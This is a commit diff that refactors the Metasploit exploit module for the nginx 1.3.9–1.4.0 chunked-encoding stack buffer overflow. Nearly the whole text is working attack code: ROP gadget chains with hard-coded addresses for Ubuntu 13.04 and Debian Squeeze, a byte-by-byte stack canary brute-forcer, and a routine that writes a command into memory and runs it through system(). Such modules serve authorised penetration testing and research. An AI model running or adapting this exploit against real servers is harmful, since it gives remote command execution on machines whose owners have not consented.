Add code cleanup for nginx_chunked_size.

jvazquez-r7 · jvazquez-r7 · commit bfcd86022d4c · 2013-05-22T14:37:42.000-05:00
diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -8,24 +8,26 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
+
 	include Exploit::Remote::Tcp
-	include Msf::Exploit::RopDb
 
 	def initialize(info = {})
 
 		super(update_info(info,
 			'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
 			'Description'    => %q{
-				This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers
-				an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size.
-				This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.
+					This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
+				The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by
+				supplying an overly long hex value as chunked block size. This value is later used
+				when determining the number of bytes to read into a stack buffer, thus the overflow
+				becomes possible.
 			},
 			'Author'         =>
 				[
 					'Greg MacManus',    # original discovery
-					'hal',              # exploit development
-					'saelo'             # exploit development
-			],
+					'hal',              # Metasploit module
+					'saelo'             # Metasploit module
+				],
 			'DisclosureDate' => 'May 07 2013',
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -40,88 +42,23 @@ def initialize(info = {})
 				{
 					'BadChars' => "\x0d\x0a",
 				},
+			'Arch' => ARCH_CMD,
+			'Platform' => 'unix',
 			'Targets'        =>
 				[
-					[
-						'Ubuntu 13.04 32bit - nginx 1.4.0',
-						{
-							'Arch' => ARCH_CMD,
-							'Ropname' => 'Ubuntu 13.04',
-							'Platform' => 'unix',
-							'CanaryOffset' => 5050,
-							'Offset' => 12,
-							'Writable' => 0x080c7330,
-							'Rop' => {
-								'store' => {
-									'address_offset' => 1,
-									'value_offset' => 3,
-									'chain' => [
-										0x0804c415, # pop ecx ; add al, 29h ; ret
-										0x00000000, # address
-										0x080b9a38, # pop eax ; ret
-										0x00000000, # value
-										0x080a9dce, # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret
-									],
-								},
-
-								'dereference' => {
-									'writable_offset' => 7,
-									'chain' => [
-										0x08094129, # pop esi; ret
-										0x080c5090, # GOT for localtime_r
-										0x0804c415, # pop ecx ; add al, 29h ; ret
-										0x001a4b00, # Offset to system
-										0x080c360a, # add ecx, [esi] ; adc al, 41h ; ret
-										0x08076f63, # push ecx ; add al, 39h ; ret
-										0x41414141, # Garbage return address
-										0x00000000, # ptr to .data where contents have been stored
-									],
-								}
-							}
-						}
-					],
-
-					[
-						'Debian Squeeze 32bit - nginx 1.4.0',
-						{
-							'Arch' => ARCH_CMD,
-							'Ropname' => 'Debian Squeeze',
-							'Platform' => 'unix',
-							'Offset' => 5130,
-							'Writable' => 0x080b4360,
-							'Rop' => {
-								'store' => {
-									'address_offset' => 3,
-									'value_offset' => 1,
-									'chain' => [
-										0x08050d93, # pop edx ; add al 0x83 ; ret
-										0x00000000, # value
-										0x08067330, # pop eax ; ret
-										0x00000000, # address
-										0x08070e94, # mov [eax] edx ; mov eax 0x0 ; pop ebp ; ret
-										0x41414141, # ebp
-									],
-								},
-
-								'dereference' => {
-									'writable_offset' => 8,
-									'chain' => [
-										0x0804ab34,		# pop edi ; pop ebp ; ret
-										0x080B4128 -
-										0x5d5b14c4,		# 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment
-										0x41414141, 	# padding (ebp)
-										0x08093c75, 	# mov ebx, edi ; dec ecx ; ret
-										0x08067330, 	# pop eax # ret
-										0xfffb0c80, 	# offset
-										0x08078a46, 	# add eax, [ebx+0x5d5b14c4] # ret
-										0x0804a3af,		# call eax # system
-										0x00000000		# ptr to .data where contents have been stored
-									],
-								}
-							}
-						}
-					],
-
+					[ 'Ubuntu 13.04 32bit - nginx 1.4.0', {
+						'CanaryOffset' => 5050,
+						'Offset' => 12,
+						'Writable' => 0x080c7330, # .data from nginx
+						:dereference_got_callback => :dereference_got_ubuntu_1304,
+						:store_callback => :store_ubuntu_1304,
+					}],
+					[ 'Debian Squeeze 32bit - nginx 1.4.0', {
+						'Offset' => 5130,
+						'Writable' => 0x080b4360, # .data from nginx
+						:dereference_got_callback => :dereference_got_debian_squeeze,
+						:store_callback => :store_debian_squeeze
+					} ],
 				],
 
 			'DefaultTarget' => 0
@@ -133,14 +70,16 @@ def initialize(info = {})
 
 	register_advanced_options(
 		[
-			OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff]),
+			OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff ]),
 		], self.class)
 
 	end
 
-	def check
-		@peer = "#{rhost}:#{rport}"
+	def peer
+		"#{rhost}:#{rport}"
+	end
 
+	def check
 		begin
 			res = send_request_fixed(nil)
 
@@ -151,11 +90,10 @@ def check
 			end
 
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			print_error("#{@peer} - Connection failed")
+			print_error("#{peer} - Connection failed")
 		end
 
 		return Exploit::CheckCode::Unknown
-
 	end
 
 	#
@@ -167,6 +105,7 @@ def random_chunk_size(bytes=16)
 	end
 
 	def send_request_fixed(data)
+
 		connect
 
 		request = 	"GET / HTTP/1.1\r\n"
@@ -187,7 +126,60 @@ def send_request_fixed(data)
 
 		disconnect
 		return res
+	end
+
+	def store_ubuntu_1304(address, value)
+		chain = [
+			0x0804c415, # pop ecx ; add al, 29h ; ret
+			address, # address
+			0x080b9a38, # pop eax ; ret
+			value.unpack('V').first, # value
+			0x080a9dce, # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret
+		]
+		return chain.pack('V*')
+	end
+
+	def dereference_got_ubuntu_1304
+		chain = [
+			0x08094129,         # pop esi; ret
+			0x080c5090,         # GOT for localtime_r
+			0x0804c415,         # pop ecx ; add al, 29h ; ret
+			0x001a4b00,         # Offset to system
+			0x080c360a,         # add ecx, [esi] ; adc al, 41h ; ret
+			0x08076f63,         # push ecx ; add al, 39h ; ret
+			0x41414141,         # Garbage return address
+			target['Writable'], # ptr to .data where contents have been stored
+		]
+		return chain.pack('V*')
+	end
+
+	def store_debian_squeeze(address, value)
+		chain = [
+			0x08050d93,              # pop edx ; add al 0x83 ; ret
+			value.unpack('V').first, # value
+			0x08067330,              # pop eax ; ret
+			address,                 # address
+			0x08070e94,              # mov [eax] edx ; mov eax 0x0 ; pop ebp ; ret
+			0x41414141,              # ebp
+		]
+
+		return chain.pack('V*')
+	end
 
+	def dereference_got_debian_squeeze
+		chain = [
+			0x0804ab34,        # pop edi ; pop ebp ; ret
+			0x080B4128 -
+			0x5d5b14c4,        # 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment
+			0x41414141, 	   # padding (ebp)
+			0x08093c75,        # mov ebx, edi ; dec ecx ; ret
+			0x08067330,        # pop eax # ret
+			0xfffb0c80,        # offset
+			0x08078a46,        # add eax, [ebx+0x5d5b14c4] # ret
+			0x0804a3af,	       # call eax # system
+			target['Writable'] # ptr to .data where contents have been stored
+		]
+		return chain.pack("V*")
 	end
 
 	def store(buf, address, value)
@@ -199,17 +191,20 @@ def store(buf, address, value)
 	end
 
 	def dereference_got
+
+		unless self.respond_to?(target[:store_callback]) and self.respond_to?(target[:dereference_got_callback])
+			fail_with(Exploit::Failure::NoTarget, "Invalid target specified: no callback functions defined")
+		end
+
 		buf = ""
 		command = payload.encoded
 		i = 0
 		while i < command.length
-			store(buf, target['Writable'] + i, command[i, 4].ljust(4, ";"))
+			buf << self.send(target[:store_callback], target['Writable'] + i, command[i, 4].ljust(4, ";"))
 			i = i + 4
 		end
 
-		chain = target['Rop']['dereference']['chain']
-		chain[target['Rop']['dereference']['writable_offset']] = target['Writable']
-		buf << chain.pack("V*")
+		buf << self.send(target[:dereference_got_callback])
 
 		return buf
 	end
@@ -218,26 +213,25 @@ def exploit
 		data = random_chunk_size(1024)
 
 		if target['CanaryOffset'].nil?
-			data << Rex::Text.pattern_create(target['Offset'] - data.size)
+			data << Rex::Text.rand_text_alpha(target['Offset'] - data.size)
 		else
 
 			if not datastore['CANARY'] == 0xffffffff
-				print_status("Using 0x%08x as stack canary" % datastore['CANARY'])
+				print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY'])
+				canary = datastore['CANARY']
 			else
-				print_status("Searching for stack canary")
+				print_status("#{peer} - Searching for stack canary")
 				canary = find_canary
 
-				if canary.nil? or canary == 0x00000000
-					print_error("Unable to find stack canary. Quiting")
-					return
+				if canary.nil? || canary == 0x00000000
+					fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to find stack canary")
 				else
-					print_status("Canary found: 0x%08x\n" % canary)
-					datastore['CANARY'] = canary
+					print_good("#{peer} - Canary found: 0x%08x\n" % canary)
 				end
 			end
 
 			data <<	Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
-			data <<	[datastore['CANARY']].pack('V')
+			data <<	[canary].pack('V')
 			data << Rex::Text.rand_text_hex(target['Offset'])
 
 		end
@@ -253,13 +247,14 @@ def exploit
 	end
 
 	def find_canary
-
 		# First byte of the canary is already known
 		canary = "\x00"
 
+		print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00)
+
 		# We are going to bruteforce the next 3 bytes one at a time
 		3.times do |c|
-			print_status("Bruteforcing byte #{c + 1}")
+			print_status("#{peer} - Bruteforcing byte #{c + 1}")
 
 			0.upto(255) do |i|
 				data = 	random_chunk_size(1024)
@@ -268,7 +263,7 @@ def find_canary
 				data << i.chr
 
 				unless send_request_fixed(data).nil?
-					print_status("Byte #{c + 1} found: 0x%02x\n" % i)
+					print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i)
 					canary << i.chr
 					break
 				end
